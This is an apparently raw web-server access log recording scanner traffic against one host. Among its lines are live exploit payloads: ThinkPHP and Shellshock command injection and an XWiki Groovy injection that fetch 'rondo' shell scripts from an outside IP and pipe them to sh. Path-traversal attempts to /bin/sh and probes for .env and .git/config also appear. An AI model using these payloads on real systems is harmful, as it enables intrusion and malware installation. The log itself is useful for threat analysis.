3.146.107.169 - - [07/Nov/2025:04:53:12 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
45.185.68.245 - - [07/Nov/2025:04:54:56 +0300] "GET /admin/config.php HTTP/1.0" 404 294
185.100.233.188 - - [07/Nov/2025:04:58:09 +0300] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0"
185.100.233.188 - - [07/Nov/2025:04:58:09 +0300] "GET /robots.txt HTTP/1.1" 404 299
3.146.107.169 - - [07/Nov/2025:04:59:26 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:04:59:27 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:05:00:03 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:05:00:03 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:05:10:06 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:05:10:06 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
45.185.68.245 - - [07/Nov/2025:05:13:15 +0300] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0"
45.185.68.245 - - [07/Nov/2025:05:13:15 +0300] "GET /robots.txt HTTP/1.1" 404 299
44.201.177.43 - - [07/Nov/2025:05:19:59 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:05:19:59 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:05:26:19 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:05:26:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:05:28:08 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:05:28:08 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.26.115.195 - - [07/Nov/2025:05:28:43 +0300] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:05:28:43 +0300] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 302 - "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:05:28:43 +0300] "GET /public/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:05:28:43 +0300] "POST /index.php?s=captcha HTTP/1.1" 302 - "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:05:28:44 +0300] "POST /cgi-bin/login.cgi HTTP/1.0" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:05:28:44 +0300] "GET / HTTP/1.1" 302 - "-" "() { :; }; /bin/bash -c \"(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\"& # bang2013@atomicmail.io"
193.26.115.195 - - [07/Nov/2025:05:28:44 +0300] "POST /cgi-bin/cgi_main.cgi HTTP/1.1" 404 298 "http://91.132.49.59/cfg_system_time.htm" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:05:28:44 +0300] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 298 "http://91.132.49.59/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:05:28:44 +0300] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 400 328 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:05:28:44 +0300] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:05:28:45 +0300] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
3.145.49.236 - - [07/Nov/2025:05:40:10 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:05:40:11 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
156.232.100.95 - - [07/Nov/2025:05:45:23 +0300] "GET / HTTP/1.1" 302 -
156.232.100.95 - - [07/Nov/2025:05:45:29 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
156.232.100.95 - - [07/Nov/2025:05:45:30 +0300] "GET /dashboard/images/favicon.png HTTP/1.1" 200 2508
156.232.100.95 - - [07/Nov/2025:05:45:30 +0300] "GET /robots.txt HTTP/1.1" 404 299
156.232.100.95 - - [07/Nov/2025:05:45:31 +0300] "GET /sitemap.xml HTTP/1.1" 404 299
156.232.100.95 - - [07/Nov/2025:05:45:32 +0300] "GET /dashboard/javascripts/modernizr.js HTTP/1.1" 200 51365
156.232.100.95 - - [07/Nov/2025:05:45:32 +0300] "GET /dashboard/javascripts/all.js HTTP/1.1" 200 188385
156.232.100.95 - - [07/Nov/2025:05:45:41 +0300] "GET /config.json HTTP/1.1" 404 299
44.201.177.43 - - [07/Nov/2025:05:46:03 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:05:46:04 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:06:00:15 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:06:00:15 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
65.49.1.192 - - [07/Nov/2025:06:01:00 +0300] "GET / HTTP/1.1" 302 -
159.65.164.238 - - [07/Nov/2025:06:02:10 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.164.238 - - [07/Nov/2025:06:02:13 +0300] "GET /.git/config HTTP/1.1" 404 299
3.146.107.169 - - [07/Nov/2025:06:09:48 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:06:09:48 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.219 - - [07/Nov/2025:06:10:28 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
65.49.1.195 - - [07/Nov/2025:06:10:33 +0300] "GET /favicon.ico HTTP/1.1" 200 30894
65.49.1.198 - - [07/Nov/2025:06:12:13 +0300] "GET / HTTP/1.1" 302 -
65.49.1.201 - - [07/Nov/2025:06:13:47 +0300] "GET / HTTP/1.1" 302 -
65.49.1.201 - - [07/Nov/2025:06:13:48 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
3.145.49.236 - - [07/Nov/2025:06:20:55 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:06:20:55 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
65.49.1.192 - - [07/Nov/2025:06:23:02 +0300] "GET /vpn/index.html HTTP/1.1" 404 299
65.49.1.200 - - [07/Nov/2025:06:23:22 +0300] "GET /vpn/index.html HTTP/1.1" 404 299
65.49.1.192 - - [07/Nov/2025:06:23:44 +0300] "GET /logon/LogonPoint/index.html HTTP/1.1" 404 299
65.49.1.197 - - [07/Nov/2025:06:24:07 +0300] "GET /logon/LogonPoint/index.html HTTP/1.1" 404 299
65.49.1.192 - - [07/Nov/2025:06:25:30 +0300] "GET /geoserver/web/ HTTP/1.1" 404 299
87.121.84.80 - - [07/Nov/2025:06:28:11 +0300] "GET / HTTP/1.0" 302 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
65.49.1.192 - - [07/Nov/2025:06:30:09 +0300] "GET /.git/config HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:06:30:25 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:06:30:26 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:06:38:13 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:06:38:13 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
80.82.77.202 - - [07/Nov/2025:06:44:09 +0300] "GET / HTTP/1.1" 302 -
94.102.49.155 - - [07/Nov/2025:06:44:09 +0300] "GET / HTTP/1.1" 400 332
80.82.77.202 - - [07/Nov/2025:06:44:09 +0300] "GET /aaa9 HTTP/1.1" 404 299
80.82.77.202 - - [07/Nov/2025:06:44:09 +0300] "GET / HTTP/1.0" 400 468
80.82.77.202 - - [07/Nov/2025:06:44:10 +0300] "GET /aab9 HTTP/1.1" 404 299
80.82.77.202 - - [07/Nov/2025:06:44:10 +0300] "GET / HTTP/1.0" 400 468
94.102.49.155 - - [07/Nov/2025:06:44:14 +0300] "GET / HTTP/1.0" 400 468
80.82.77.202 - - [07/Nov/2025:06:44:15 +0300] "GET /aaa9 HTTP/1.1" 404 299
80.82.77.202 - - [07/Nov/2025:06:44:15 +0300] "GET / HTTP/1.0" 400 468
80.82.77.202 - - [07/Nov/2025:06:44:15 +0300] "GET /aab9 HTTP/1.1" 404 299
80.82.77.202 - - [07/Nov/2025:06:44:15 +0300] "GET / HTTP/1.0" 400 468
3.145.49.236 - - [07/Nov/2025:06:48:05 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:06:48:05 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.212 - - [07/Nov/2025:06:54:34 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
44.201.177.43 - - [07/Nov/2025:06:58:13 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:06:58:14 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:07:01:17 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:07:01:18 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:07:11:40 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:07:11:40 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:07:21:46 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:07:21:47 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:07:21:54 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:07:21:54 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:07:24:17 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:07:24:17 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
2.183.94.234 - - [07/Nov/2025:07:30:57 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
2.183.94.234 - - [07/Nov/2025:07:30:57 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
178.128.78.154 - - [07/Nov/2025:07:33:40 +0300] "GET /.env HTTP/1.1" 404 298 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
178.128.78.154 - - [07/Nov/2025:07:33:41 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
3.145.49.236 - - [07/Nov/2025:07:39:45 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:07:39:45 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
159.65.164.238 - - [07/Nov/2025:07:44:31 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.164.238 - - [07/Nov/2025:07:44:35 +0300] "GET /.git/config HTTP/1.1" 404 299
193.142.147.209 - - [07/Nov/2025:07:46:37 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
44.201.177.43 - - [07/Nov/2025:07:52:21 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:07:52:21 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
172.237.102.154 - - [07/Nov/2025:07:53:26 +0300] "\x16\x03\x01\x02" 400 325 "-" "-"
172.237.102.154 - - [07/Nov/2025:07:53:27 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
172.237.102.154 - - [07/Nov/2025:07:53:27 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
20.169.107.239 - - [07/Nov/2025:08:01:14 +0300] "MGLNDD_91.132.49.59_80\n" 400 325 "-" "-"
93.174.93.12 - - [07/Nov/2025:08:10:38 +0300] "\x16\x03\x02\x01o\x01" 400 325 "-" "-"
204.76.203.219 - - [07/Nov/2025:08:11:21 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.165.135.242 - - [07/Nov/2025:08:13:26 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.165.135.242 - - [07/Nov/2025:08:13:29 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91-132-49-059.cprapid.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
3.145.49.236 - - [07/Nov/2025:08:14:49 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:08:14:49 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
43.167.239.66 - - [07/Nov/2025:08:18:14 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.167.239.66 - - [07/Nov/2025:08:18:15 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
44.201.177.43 - - [07/Nov/2025:08:22:26 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:08:22:26 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [07/Nov/2025:08:23:58 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:08:28:26 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:08:28:26 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
112.46.212.55 - - [07/Nov/2025:08:29:29 +0300] "GET / HTTP/1.1" 400 325 "-" "-"
193.123.71.84 - - [07/Nov/2025:08:40:34 +0300] "GET / HTTP/1.1" 302 -
193.123.71.84 - - [07/Nov/2025:08:40:35 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
3.145.49.236 - - [07/Nov/2025:08:40:52 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:08:40:53 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:08:42:03 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:08:42:04 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
23.95.35.114 - - [07/Nov/2025:08:45:13 +0300] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 329
185.243.96.116 - - [07/Nov/2025:08:48:29 +0300] "\x03" 400 325 "-" "-"
44.201.177.43 - - [07/Nov/2025:08:50:29 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:08:50:30 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.18 - - [07/Nov/2025:08:53:16 +0300] "GET / HTTP/1.1" 302 -
3.145.49.236 - - [07/Nov/2025:08:54:59 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:08:55:00 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
64.62.156.66 - - [07/Nov/2025:09:02:23 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
45.156.129.57 - - [07/Nov/2025:09:03:07 +0300] "GET /OA_HTML/AppsLocalLogin.jsp HTTP/1.1" 404 299
64.62.156.75 - - [07/Nov/2025:09:03:59 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36"
64.62.156.75 - - [07/Nov/2025:09:03:59 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36"
64.62.156.67 - - [07/Nov/2025:09:04:59 +0300] "GET /favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
3.145.49.236 - - [07/Nov/2025:09:05:25 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:09:05:26 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
64.62.156.66 - - [07/Nov/2025:09:05:49 +0300] "GET /geoserver/web/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
64.62.156.66 - - [07/Nov/2025:09:06:26 +0300] "GET /info.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
64.62.156.66 - - [07/Nov/2025:09:06:37 +0300] "GET /phpinfo.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36"
64.62.156.66 - - [07/Nov/2025:09:06:39 +0300] "GET /dashboard/phpinfo.php HTTP/1.1" 200 84072 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.28 Safari/537.36"
172.237.102.154 - - [07/Nov/2025:09:11:50 +0300] "GET / HTTP/1.1" 302 -
172.237.102.154 - - [07/Nov/2025:09:11:50 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
185.243.96.116 - - [07/Nov/2025:09:18:25 +0300] "\x03" 400 325 "-" "-"
3.145.49.236 - - [07/Nov/2025:09:20:12 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:09:20:13 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:09:24:35 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:09:24:35 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:09:30:31 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:09:30:31 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:09:47:09 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:09:47:10 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
185.242.226.107 - - [07/Nov/2025:09:53:01 +0300] "GET / HTTP/1.1" 302 -
185.242.226.107 - - [07/Nov/2025:09:53:02 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
3.145.49.236 - - [07/Nov/2025:09:56:45 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:09:56:46 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
87.236.176.203 - - [07/Nov/2025:09:59:55 +0300] "GET / HTTP/1.1" 302 -
87.236.176.203 - - [07/Nov/2025:09:59:55 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
185.247.137.187 - - [07/Nov/2025:09:59:56 +0300] "GET /dashboard/images/favicon.png HTTP/1.1" 200 2508
204.76.203.219 - - [07/Nov/2025:10:16:50 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [07/Nov/2025:10:20:41 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.145.49.236 - - [07/Nov/2025:10:21:00 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:10:21:00 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:10:23:44 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:10:23:44 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [07/Nov/2025:10:29:20 +0300] "GET / HTTP/1.1" 302 - "-" "-"
3.145.49.236 - - [07/Nov/2025:10:43:34 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:10:43:34 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
34.247.51.117 - - [07/Nov/2025:10:50:49 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
34.247.51.117 - - [07/Nov/2025:10:50:49 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
103.106.119.113 - - [07/Nov/2025:10:51:54 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
43.155.195.141 - - [07/Nov/2025:10:56:00 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.155.195.141 - - [07/Nov/2025:10:56:01 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91-132-49-59.cprapid.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.242.226.107 - - [07/Nov/2025:10:57:18 +0300] "GET /dashboard/images/favicon.png HTTP/1.1" 200 2508
44.201.177.43 - - [07/Nov/2025:11:00:49 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:11:00:50 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:11:06:23 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:11:06:23 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:11:08:04 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:11:08:05 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
